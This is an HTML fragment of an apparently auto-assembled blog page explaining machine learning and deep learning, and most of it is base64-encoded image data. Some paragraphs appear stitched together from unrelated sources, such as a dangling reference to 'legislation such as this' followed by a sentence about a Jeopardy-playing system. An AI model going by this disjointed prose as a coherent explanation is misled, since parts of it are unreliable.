zyw5FSkYjWkL4ySry3VVAplVJ5anI3vhOpSmRM7bgjnvcAj4jkccbUBwR9\/JdcyPv7K4pKLx6QeX788RnHacAbG5+cHEscq14kGxB+AifKYscI8ayYNE1BupXUvQkkBl\/sn4xPli6jWDajTO5hcaMqtZdrxyj8JH4Rh\/l6inV1sw+BuPx+eI6k3PmAfx3\/D549HI9GInyMH8xjYeJVwVypU6rKCIAi8sATHQTN7x+hwyp5g3EQdjI2MzvvGKllu2lZTIFMf4T+AbHOY7Y1WMwgPkD\/mxVWtmvgyZSoYQtHytRWF5DfzFtunhFovsb3HliUq5dCLgnwiTqAg3B5GLX2PPqMZAe1dTxSqHVuSGnyjxcscv2qq9QLRafx1TjgtafdMQR0x7qQ1iVfuP8NCLqWsDBEoWIYTOkrOnXadgpHQ4gqRxUzxl+i\/I\/rhROPOOS\/I\/rh9tUc1SaTlcc+wsbbXAG\/54a0yMVt+0dQiIXedj\/mwm3HX6L8j\/AJsUVgHOlqZoy1sFXHNHxKeojzkWn02+WJHs5mwryQOd7zHOBztOKAe0NSAIW3kf1x1S7SVAZAX5H\/NioBzSCNwpuh0g81uHf4O+xkv\/ALQ6\/wDLS\/4W\/wA+OW9oFb+Wn8n\/AM+PQniFLx9l5\/8Ax1Xw91rne4873GRjt\/W\/lpfJ\/wDPg\/7f1v5afyf\/AD4ib+mu\/wCPq+HutdZ4x53mMkPtAr\/y0\/k\/+fAvtArfy0\/k3+fEfz7UHh1T7K1rvcJPm4O0\/vyxlT+0Cufs0\/k3+fHT+0OuRGml\/wAL\/wCfEH3rSMKTOH1BuB7rTRn4O0ffh7RzitYAlj0H4dMZAe3lbktMR\/Zb83OPcx29rNutPeZCkH5hhij81jdWiwJ3W1ZfgdUqWVqSwYCvWpqSb7amC2i\/iEYY0KBLkOVDKY0llF\/ITf8AA4xp+2VY7hPk3+bCS9q6u40gjaAR+DDFJuHdfh\/Kv\/Is6H3\/AIX0JlMxUI0opgGDJCrMTGpiqm14k2vtfE9wTiodAWqKv9kKWMfNRtynpj514V7TszTBA0Gf5tZPpaoLY9\/9plfklEegqX+dXENcqwWzRylfQvartCKJRkYOpuVKMH8yCD3UC27Tta5hnlPaC5ZRLkGPEQpHOGNhEqGMyRIJHIY+fsz7QazGdNMHyDj\/AP0\/D8hhce0uvM6KPu6PcYiJJ51DBk8o5YxOJ2jrgQGh2N3ck7R00\/04X0hU7QalBBImCBEEmR8AT4WBNyFaJw\/yHacMQpOmxYE7CGdAAD56uVtuox8s\/wDtEzH9jaNm2\/4ulvS2Oanb+ud9HLk14\/x7\/wBceSd+DnuEGE6LzwX1fn+OOrAaVqhSpeGB6EWJUi20zaImSDUeIdoV1tClU1GD9uC0ixtOm2xuDjAaPtFzI5qdtwx2Efz9IHwGPH9odc7inJ56WJ+98eg\/DnCa3DHuk4IGxO\/WPdJ3hZcRIyOoC1jNhTVNQsT5NBMiI2sfj9++DibCspXWTcjwgH\/itAkbx88ZXQ9pFcCNNL\/hb\/PgT2i1QSRSoAndgjAn1PeSfjj1JeIhLhhWkcPyNOlYKdgLsx25hZgH4H0xIUa+1o6GfygfsYyxfaZX\/wDToH1V\/wD7mE39o9b+SiPRX\/OocVghuApkErV8vR8cveJtplT5G5EesbYmK2ZXTAWnH9mms\/Pf5Yw4+0avvppT10v\/AJ8dD2kV\/wCSjffwv\/8Acx2Wky4LneAhpWq1uGhjIbSTvI38o2wZbIhSQxUmfQz5if3OMqPtIr28FK3lU\/8Au4cH2qZj+Sjbnpef\/wCTFwqMVWhy1VSgm2n7v9fX78I1M6og6S\/92PvmPuxmI9quYn3KJ\/w1Pyqz9+GR9odbUWK0iTvIePl3keXXHTWC52RWo8W4qVI0pvcgwCo6yDBn5+uIniuZappKGHQyPFyIggrDA4z7Pduar7pSHoH\/ADqH5Y8pduKo2WmPQN\/nj7sQdUBUhTKvBzuZ2k\/MEfDw45q8aqbNbyAifiDP5Yo1TtrVP2afyb83wlU7W1D9mn8m\/NsVOcf+pUtCvNXibQYAAHK5HwE4Qp1yWAiJseQva19gIxRh2lqdF+R\/zY8XtHU6L8j\/AJsJVWVam8LoaQrrm0K+Z\/f5DHmXpTESTBJERECTBkyOc2+OKie1lWZhJEXgm4MjdiMTdT2o5hgdSZd2ZQpdqK6tI2FiFMb3U39BhGrbXGNIB65j6H5pijTpu\/5HR6Sp2jkJK8xIv6iRbnYNIj7JGEq+YNQy5B0wohQgi8WUDnN94IHIAVyl7QKoXSadEwrICUaVDXtDgWMkSDBepHvtMcO1VSAIS3keX+L9+lsdbZ1Zl0eHh1XDAEAq85XLzN59NzaR84Ii14vcYQqZRiGgFgtywBIEzBJGwMTfFayfbuqpJCUr9VeORFtcWZQwGwI6EjC\/DvaTmqU90wpzuF1Q3hC+JSxDQBAkGJaInEX21wJ0Aepj5A\/JFNtOe8THgFMZWsRe07CQCBy91gRz57HC2c4s76dek6RCjQi26EoqyLc559cVB+1jwPBTBH2gHk\/DvNPT7PL1nj\/tTUtK0zBJ90jczchgT8SSMT\/JvJ1FolRkgQDhW+pX1NJhZiQigACeS2E84tfEnkWYLPIn5Ac43ifn8poH\/a15nRSty0sR97n78KP2zq8lpjrAYTty1xy5DEX2FRwgQpAjmtMyuf1RqgQZggESbmfuNgemGvarSKTaYEqRa95LjrtAAJ5R1xng7Z1uiG83B3kH+aOX44M72xqOpVlp3EEw2raJkuYO3xxXR4S4VA4ugAzCkXNjxXWrY+X5wfu\/DHbVbQbHf7yP8uII8Rby+\/8AXAeINM2+\/wAt7+WN05UA6EzwYMGBRRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhGDBgwIRgwYMCEYMGDAhf\/Z' alt='https:\/\/metadialog.com\/' class='aligncenter' \/><\/a><\/p>\n<p><p>Just as vision played a crucial role in the evolution of life on earth, deep learning and neural networks will enhance the capabilities of robots. Increasingly, they will be able to understand their environment, make autonomous decisions, collaborate with us, and augment our own capabilities. Training data must be cleaned and balanced before it\u2019s presented to the model. Duplicates and low-quality data that doesn\u2019t fit predefined labels will alter the algorithm, and model accuracy will drop as well.<\/p>\n<\/p>\n<p><h2>What&#8217;s the Difference Between Machine Learning and Deep Learning?<\/h2>\n<\/p>\n<p><p>You can learn more about machine learning in various ways, including self-study, traditional college degree programs and online boot camps. Machine learning is part of the Berkeley Data Analytics Boot Camp curriculum, which gives students insights into how machine learning works. Berkeley FinTech Boot Camp can help demonstrate how machine learning works specifically in the finance sector.<\/p>\n<\/p>\n<div>\n<div>\n<h2>How does machine learning work in simple words?<\/h2>\n<\/div>\n<div>\n<div>\n<p>Machine learning is a form of artificial intelligence (AI) that teaches computers to think in a similar way to how humans do: Learning and improving upon past experiences. It works by exploring data and identifying patterns, and involves minimal human intervention.<\/p>\n<\/div><\/div>\n<\/div>\n<p><p>Legislation such as this has forced companies to rethink how they store and use personally identifiable information (PII). As a result, investments in security have become an increasing priority for businesses as they seek to eliminate any vulnerabilities and opportunities for surveillance, hacking, and cyberattacks. The system&nbsp;used reinforcement learning&nbsp;to learn when to attempt an answer (or question, as it were), which square to select on the board, and how much to wager\u2014especially on daily doubles.<\/p>\n<\/p>\n<p><h2>How Deep Learning Works<\/h2>\n<\/p>\n<p><p>When analyzing mammograms for signs of breast cancer, a locked algorithm would be unable to learn from new subpopulations to which it is applied. Since average breast density can differ by race, this could lead to misdiagnoses if the system screens people from a demographic group that was underrepresented in the training data. Similarly, a credit-scoring algorithm trained on a socioeconomically segregated subset of the population can discriminate against certain borrowers in much the same way that the illegal practice of redlining does.<\/p>\n<\/p>\n<div style='border: black dashed 1px;padding: 10px'>\n<h3>Ready to work it?  News, Sports, Jobs &#8211; Messenger News &#8211; Fort Dodge Messenger<\/h3>\n<p>Ready to work it?  News, Sports, Jobs &#8211; Messenger News.<\/p>\n<p>Posted: Sat, 10 Jun 2023 05:09:15 GMT [<a href='https:\/\/news.google.com\/rss\/articles\/CBMiS2h0dHBzOi8vd3d3Lm1lc3Nlbmdlcm5ld3MubmV0L25ld3MvbG9jYWwtYnVzaW5lc3MvMjAyMy8wNi9yZWFkeS10by13b3JrLWl0L9IBAA?oc=5' rel=\"nofollow\">source<\/a>]<\/p>\n<\/div>\n<p><p>Long before we began using deep learning, we relied on traditional machine learning methods including decision trees, SVM, na\u00efve Bayes classifier and logistic regression. \u201cFlat\u201d here refers to the fact these algorithms cannot normally be applied directly to the raw data (such as .csv, images, text, etc.). Deep learning is a subset of machine learning, which is a subset of artificial intelligence. Artificial intelligence is a general term that refers to techniques that enable computers to mimic human behavior. Machine learning represents a set of algorithms trained on data that make all of this possible. In traditional terms, artificial intelligence or AI is simply an algorithm, code, or technique that enables machines to mimic, develop, and demonstrate human cognition or behavior.<\/p>\n<\/p>\n<p><img decoding=\"async\" class='aligncenter' style='margin-left:auto;margin-right:auto' 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TnpqSLVdE+IjW+MUerdoAb0jC06rm5x2I1X+XqaqJF7nub616H+A1yruhnGDzuvTz67qMk\/mZ83uhF9kcwDnAXykGQJlNoL8LTk7bh2JO5pobS1rTUwNAs2N2taohb1MkIeAAA1k0bR4KJ4WvbtAKOGYhLTydBIT1ZquhUO4nuZ7Su\/4DEhOMSXv\/AJvqOHz1LwJXnu46u5Xz8Ap3\/wAYk\/8A06o\/59KkUsQEgK0MZrC+mc2\/DffeqnxOotLNt\/PS7m\/OO4uXB9Z+l3M9pIcbm\/LT7Pz0v\/MckhnHV3JL4LuK0IMTIiAB3DevSGAS\/wDc+sOf+cWbhf8Aymk3Xsqm5Lqq+JYSM\/8AOeH7m\/63DwcVZ+BSf9zKw\/8AiLP\/AKqkVO8kU4OJ4SMv86Yf\/wDWQq4+K72HhZefhrS2CobfUuPML2Jyi1sGL1eKaPTlsVXSmGowue1r61FTzSNO3Wc18kmuwW1oX3aLwl48taH6DVVViH4J1HRVLXubUFzQRTxxkc7M6zukwAjUIOrIXxAHpgp6+FPjMlPpFXTxOMc0MlFJFI3wmvbQUhB4Ebi0ggi4IIJCn3KL8IumfQCeljbFjOIxNpa+RgLX08VPrAua\/aTJzhELgdYMddzg6FrVOWJkjruGneqtJVz00YZE7J\/8p3lWpodpXTOixnCqJoFDhGHGFsgzM9RIyr+MP1h4YD4832GvIZXZgtK8Xz1H5LYfB4Dh+krr+BnMDT6R2FgMPj\/5dcvPE2LDm7WHg8OpIq4zIGGy0MHqWUxmbta2z45G69S\/C9d08HyJ\/kDtluMPEhUVVMyOTh7\/AKSub4adfzbsGNr3oH\/XCvP8ukIseiO4qnXQSGYuaOC1cEroG0LWPIuNrL2lXzpO3\/upg23\/ADpUdv5zF+v7VVMbbDY73\/WVmaW19tEcFfYZ4rUZbvzmL+pUwdIxbwW9xRiEMjnNtwCjgVZBHG+5F9t25XvoO\/8A7rYwf\/FYO3w8J61WsVRlsPo9pTrQbEP+6WNSW2YrBlu\/OYR61TDNKfoj0peIUj3hlho1NwPFY4XTXdq8nuHwUiqai74ciPy0X\/Mb1qzvhr1rWYszWNr0FPvt\/PVXWFSFNpBrywDVAvPCL5\/ONXq\/4TfL3UYXXtpIoKWVjqWKfXmZI6TWfJOwtuyVo1QIwQLXuTnwsUVKRTuY7LNZ2LYntVrJI7OsCM8gvMdFiLXZNz6r39Gsr3+CJOXDG4InCKvmpIzSPdtBa2pYHN25RTSxOdbxmcFVnKVy\/wA2IxxxTU9PG2KXnWmFjw4u1Hx2OvI4atnk9oCg1Pps6N7JYg6KWM60csZLHsdsu1zTcXBII2EEg3BIS4oHQz7TQSOKZVVrKukMbyGm97DMZdgTvXU8tLOWTxzU9ZG4vJdrMnD9Y\/lWyXDnazrkTMcQ7aHG90aQ4q+YyyvL3yylz3yON3Oe7eTfyADICwAAACs3RD4SbKnm6LGqWKrpXuDPjfNhssBd0eee0Wb0bgmSDmntbcgOIAMa+Ejoq3CK74tGC+nmibUQF2bmNc97HQud8oxuYbO2ljmXubkznoXecy5F9CVClxtt+jlABtbaAyI5XVrfCCoparB8Fnomvlw6GnAqIIgX6jmxwsidJEy5cKd0c8Tsjzbrk7y3z7gmkD2RywxPe2GfV56JjiIpdVwc0vYDqkgtHSte1xexIPbk85aKzDnF1K8tY52tJTvbr08hta7oyQWuNgC+JzHkBoJIFle2ilTQ6UQ1RbSsosbp4+d5yO3N1F7hrnkAGVjnNax3OtL49Zmq92asSwGcbQuHW0vkqFPXtoz0Zs5l7g2zGd87qimVp4fX61l1WeH1qL0+leQ6G1dfxo+gPQsg0MgPm969M3G4SP8Audx+CfX1B6vSubpj739aZvxo+gthpNf5Hp+5Hgkg+73qPjWnP7TuKcZJD763rSaVx97rlLjh3s1e3L0WSafGidjdvAfWSLD6+pOjppfR71UnxGlA8\/uKUMkIP+Kead5I+5yij6p205dRcAfTc\/UstrXDPXH6IOffn9asOoi4arNZjAacmkjkpWSfcO9Sxr9f1+pR5lc7IlzgcrdMjLy3cfQnCl0iBIa4A\/SsGm\/C42nrKQ+iePNzVqLFYnmzxs96eYJTx+tPuG1rhazvR6woyau27I7CnCjrVl1EJIzC2qeZl8ip5h2kcrbWkt+q0\/Wwp9pdOqgbJj\/RR\/ulX9JVJ0gqgsGakZe+yOQ+C0ehikGYHtF1Nzp5UfPu\/oo\/3S6RaZzHbMfMj\/dhRFs4Pv8AclcEo9z9yqPhbw9yh4FDuaOQUpj0sl+ePms9hKYtLJfnj5jPYUVbMOvvXRjh7n7lVdA3h7kGii9Ech8FMYdLJfnj5rPYXb8aJfnT5rfYUSht739SUMa3r9\/IkuZbikuoIfRHIfBP9VpDJf8AOO80fY1KaXH3+Oe7+6orPG2+\/v8AuW8DGjj3\/coOYCN6gaKHh3KfQY2\/x3dw9lK4sdk8d3d\/dUIilZ1959SVRys4nvPquqhDxoSkOoIuHcFPYMbf47vf9VKG4y7xj7+RQBs7OJ70fHmj5R9KWeld953M\/FJdh7Nw7l4e5geOPSsmAeP9aQ8+eKwZSvvuweP1yXhenZw+uauj4HuAifHKAGz2QmWpcCNhhieYnDLa2cxO3bL7bKaf\/aB46ZcThpta0dJSMIba9pah7nyHyxsgH6qjnwDK8NxuJpOc1NUxs63BglP7MTj5F6Z5S\/gxwYliU2I1NTKI5GwtFNC1rHfkomMJdM\/X6LtXwWsBHjXOTNnybKsZRt7Vl4CigHjnuPqSllI35w+a71L1P8L74P8AS0eHxVeHw818UfaqAc+R0sMxa3nXukc5xdFIG5CwDZHnINAHj1rzxSHQnj7loRVzd7e8\/FP3xJvzh813qWrqVvzh813qTNrlWj8Fvk7\/AApicMLxrUsH8pq+BijI1Yj\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\/OP4kWjbs8FpzdbZc2\/R2onrC7MnLdw7GtAt5clMMsll5K2o65w2MA8jh5c3etKPwgb3I8oLge4myRsqzsDRb6TQT\/ZuFxe\/qI62n7CbI2BwR0h4p7jxXda7d7tpHp1m9uxKoZA4mwPHVIubdpJDx2WHEEKOiptt6XAkWcOwi3de31pSyvAtfMbWnPLsO0dd+tLdHbRMbLfVS\/B7GzSBYk9+\/VztceKQBbh4Sf6WiHv8Afn5DY8QFD8IxVj7tO3aDax1us2z\/AEs7E55HKWU9Q4QueBzjY87ggnU2C+ZzZwv4PWwhZNdA5wu3Vb+F1jWHZdpxT1TUnWe9LoKN3H0\/coZDpqB8h37PrSuLT9o+Q\/8AZ9pYMlDU+j7l6RmJ0\/p+\/wCCm0dC7j6fuS6nw93jelQZnKOzxJO5ntpTFymMH83J3M9tUpMPqz9z3JzcSg3PH17FO48PPjFd2UX0ioG3lQj+bl7me2ureVGL5uX9j21UdhlZ6B7k3w+I\/fCnzKb6RXYU2zpFV+zlQi+bl\/Z9tKTyoQ5fk5f2fbSHYXV+ge5HhUZ0eFNZqfPae4rMdP1u9KhEnKfDf83L+z+8W8XKlD83J+z7aicMq7eYe5c8Ib6QU7bB1u9K6Mh\/S9KgzeVSH5uXub7a7M5VIPEl7h7aScMq\/Vlc6YHeOanBj7fSmPSOqDWnMplfypw+JL3D2lFNKdO2SAgB\/lH95WKPCqgyDbYQFXqKgtaTlzCppmCu6\/R611\/AR4+\/epY3FJR\/MrWfG5fmfSvofhc5OQHMKn4iwxguXP8Aax\/wUl+CVFBFjdA6d7mgveyBzXNa34y9jmRMlvclkms6INbYl74xe2svpQvkzX43JcEM1HNILXNdZzXA3DmkZhwNiCDcEL6T\/B95QBimHU9Zlz1uaqmi3QqYrCUaoJ1Wv6MzWk31JY7rVpnuc3ytea8Zi1NDFL+pJI6wR71M8cwxk8UsErQ+KaN8UjDscyRpa5p7WkhfLPlD0CdQVtTQyHpU8pa1xH5yI2dDJt+XE5jiBsJI3L6sLyt8PjRK0dPi0YbrxubSVAJAL4nlzoXi5GsY5NZpDQXES32Rm0pw7Y8nVV8PdEJh0un1wXjWbDQBfWHv5V78+BNyd\/EcNbUPbaoxAtqH3FnNgsfi0Z\/UcZrHMGZw3LyVyEaPHFMRpaN4aIC4zVGdi6CHpvYMwSZMoujcgPLrWabfStjQAAMgMgBsA4BLpQ+13q1izoA8Nh036j3rK81\/D\/5l1DSRve4VBqtenY1w1SGMLZpJWkXcxjHhgLSCHys3FwXpRfPD4QPKUa\/Ep5o7OpoP5NSm\/RdHGTrzNsSDz0us8OyJZzQPgqVVIWRkjVJwqmE84DtBmVWEOD\/S9H3q9fgL0erjEmd\/\/h9Rut\/P0qq6DHn+I3vKuP4F9cX4u+4Ath9Rs\/8AOpVkUc0rpgHDLtC9XjFJTMpXFmvYfilfJJjMWLU9To3XOs9sk0mE1JzfG+N0hbELm5dAC7VaCNeAyxdEMF0vJnoT+L8NTjGIMa6uY+SkwulvcOl6TH1IO3m3gOIf0SIBIczMwCpJ8WkbK9zAGvjqHvjkaSHseyUuY9p3Oa4BwPEKQ8pHKTVYhIyaoay8UTY2MbcMbkOde1pJs6V41j1BjbkMBTjXkA3HlA2Gf1oqIwS7hsnyCLu15DtVh4tiEtRonJNM8yTTYm58sh2uc6suTYZADYGiwaAALAAKC\/BWo9XHMMNz4VXut\/8Ah9Wp5TVRGiWvYX\/CJy3Z1agnI1pUIMUw6olDWRMncx79gYJ4ZKbXcb2DWmYOJOwAlSlmeJo76EC+aVBTMNLOBuc4DXdayYOUvDQ7EcUNyL4niG7\/APNzda7cjFCG4xhRBJ\/lkO6289amvwksNnw\/EalxjHxarldUwTEHUe6U680Zd4IkZKZLsvfVLHWs5cfgy0E9fi1LI1n8no3GonlAOo0tY4RM1vBMj5SyzL31WyO2NKrME\/hViMr8d3JW5pKY0Fxrs9etk1\/Ccw0PxjE7k5yQjIX\/ANEp+tWQ4UmkNFQ0slS2jxigYYYudFo6kFsbXagu0SCYQsfqsJkicH9FzTd9c8remfPYhiFRGGuhdUOax5zD2QtbCJAQbFr+b1wfFcEwaXmppyxlVTcyZo2yxiVurzkbgCCLm1wCA5h6TCbODTko+EzCV9m7Tb8fkpGigdBFd2y8AW7bZ9qWaecllZhx\/lULhGXBramL8rTuJ2DnBZ0ZJyDZmxudY2B2pBoXSNFbhxGt\/nCi2iw\/yqJXp8EXSWeujxKhqiZsOZTt6chLhC55cHRNkcSdXmxzgbf8nzYLdW+dJaA4xI+qwwODc66hvkb51MXWpSRFskb2aE6E6JcNT0kUsbwLtGo0N\/cpt8LimBxeqJ1r8zTbBcfmQpDpB\/JNFKCGMlv4Sqb1Dxk5zJDPUEG227IYYCN7AQcsk2\/CorXtxaqa0NI5qm23+ZbwKkWg1I7F8Afh8eqcRwuYzQxOIbzjdaV0ViSAGvhllpmucQA9gLrDMuY5xmlbvztmqrw0U8D3DIEXXn0UQ3E933LAgC6VlWWOdFK0xSsOrJE9rmSMcNoex9nNPUQFmljc9jpmscYWPbG+YNcYmyOBLWOkA1A8gE6pN9nELLDJN4K3jNFlYha82Fs2FvH0fejmwsiILntUHG+4IdC3j6PvXKSJnH0fetzGFycwKbQeKrPd1Bac2zeT5LLbVh36\/kc0f\/tFc3sC4PjTmtvvKpvd1Ls\/4v4sh7ZGfZAFhtZTjbDrfpSv\/wCgsSCaNI5WJ7YQd55lU3vPAJ9djdKP9BhPbNV\/ZVhMGLytdrPZG2IEXDGl7mgbNsr3vPHN29JZmrq2IlmXyTY9V8x359xV2GINOp9pJ96oSlJqmWzbDaLDyjW+0BNzpMrDtJ+37BwTzh+ASynotJ8hKluD8l0x2iw4nerBka3UpbYJJNAq8pKQnclRoON+wetXVh\/JyxoF9u\/705x8njD\/AIdfpSXVjQrDcPfvXnuSMN6uA+3r8voXAMaTsPacwru0w5Og2Mvbbo7eFur\/AAVOV1MWkjZn77PftTopQ8ZKtPAYzYrmyjB2W8hsViSltv7x9ewhZjYBsvfbt+pZqKknb6RcHt9Y4qTrpbbLthlLd1h3faOwZ9l+pP8ASYi+OQvZYSAkOYc2uOxwLARfXtcn5V+sKKwuIza61s7XO3iLXIPcnqeoLjr5XIBvZoOYvc5g9u7hbYkSNuc1ZidkrAlxNhbG9mH0rg9gcS2F5AdvGUlhY9EgZXB3WWgr\/wDw2n\/oH+2nTkzqo5IS15kEjH3NmtdcOabEF0reiXNdcbnE8QpbFFD48v8ARx\/xC8pW4gYJTHs6dZXq6HDIZ4RISc+AUAFW7\/ZkH9Wcf+pb86\/\/AGbD\/VFZEcUXjSeZH+\/SyCGLxpPMZ++Wa\/G3D7ve5Xhg0A9LkqqL5f8AZsP9U+5bN57\/AGdD\/U2+yrdZDF40nms\/errHDFxk81n7xIdjzvRHMqYwqAelyVP6k\/8As+H+pM9hdDHP\/qEI\/wDRR\/u1ckcMfF\/mt9tdo4o+L\/Nb7aSftC\/0BzKkMPgG48lSUlPUf6lEP\/RRfu1j4pUH\/Q4\/JRQ\/uVeEhj4v7m+0iJjOLv2fWo\/pDJbzB3qQpIRnsnkFRUuC1Dv9Gt+jTRt\/sxhcDovP8xJ5lvQAvQbY2cXfsrdrGfS72qH6RSeiO9NAjbo0rz1+K83zMnmlIK3RqX5p\/cV6WMDfpd7UlqsOafG7x6lOP7RvBzA5lRlLHCxae5efafkyrP8AVJvMXc8mVV\/q03mj1qrI9JqkbJ5\/6V\/tLuNLKn\/WJ\/6V\/tL3hoan0m968kMZ6h+7+ZT2s5Nqkf6PN5oH1lTrkL0rxDBvjTYqR08dS1hEcj9RkczLhswDSdbWYSxzBql2rH0hqWNCv0jnO2aY\/wDzHetafhqX52Tz3etMjgq2aPbyJ\/EJM1XFMLPaOVv9y9s6L\/CCxAUk3P0BlxAzEQNjAipRE5os6QumkkvG7W6AJLxqjWbm4UvphgmK4lN8Yq2SyvF9RvRbFC1xHQhjD9VjcgCc3OsC5zjmqRjxubdLL\/SO9pLI9Jakfz039I\/2lydlY8W2m8iPxRSOghdtNbn1i\/LylaI5K6tpa9sErHscHse06r2Pabtc1zXhzXNIBDgbgq\/uSrlfxGnbzGIU0tQ1rXc3VM1BPdoOrHO3WDJAfB54arhlrB5JcPGv4z1Pz0\/9I\/2lqdIp\/nZfK8+tJhirY9Ht9tz+Kt1MsFSP1gHaG2P+perK3lhxmalqaWSkjElRG6NlTC4xPhbJk86hlfrvDC5rXtdHqnVdmW2NQYdyZVeQFO7q6bP3iq\/8OzfOSecfWsjHJ\/nJfPd7ShNBWy+c9vI\/1KxSVdPS36NuvUf6ldMHJXXf6u7z2fvFKOTHAcSw2pNXFSte8wvg1ZHDV1XujeT0ZQbgxgcMyvObNIKj52b+kf7S6DSGo+cmP\/zHH6yq7KGrY7aa9t+w\/FWZsVE7Sx4Bad2wf61btTydVl3OMJGs5ziA9m1xLj\/OdaRS6A1fzTvPZ+8VWux6fe+Tzj61yOLS+M7vUfF1WTfbbyP9QTxjcYbbZ\/l\/MV6Dp6TEThv4IFMzmOf5\/necbz2tzvO2\/O6tr5bNiZByS1zhYxZHjLH+9VLsxKTi7vSmPFpvGf533qctHWPttSNy\/un+oqtFiMMd+jba5JPkk5n\/ADL1noXpBjVLE2mlhgrado1WtqHMMjWi2qznRJZ7G7ucY92wa1gAkmn+mGLzR\/FI4IKKnkGq9tO9gkc12Tmc6ZAGNcMjzbGu29KxsvLrcYm8Z\/nLjWYtJdpJf5yaG19tnpW8vmqZ8EDuk2Bf\/Cbctu3crXk5OKm2rzbbbLc9Hb\/mq2NFdNMUZC2lqqWlxGBoAb8YliEtgLASSF0jJbDLWfHrnMuc4m68rnF5OLu8LX8KO6+8JUNNWxG7ZG8vzK1VVVNUNDZG6f3SPcV6y0sxTFKuA0cNNSUFI8FskMEsZc9jsnMLwWNbG4ZOaxjS4XBcQS0wzDOS2rikhmDYi6CaKZoM7LF0MjZGg2fexLQDZUIzF3cT3hdhj58Y94S5qSukcHG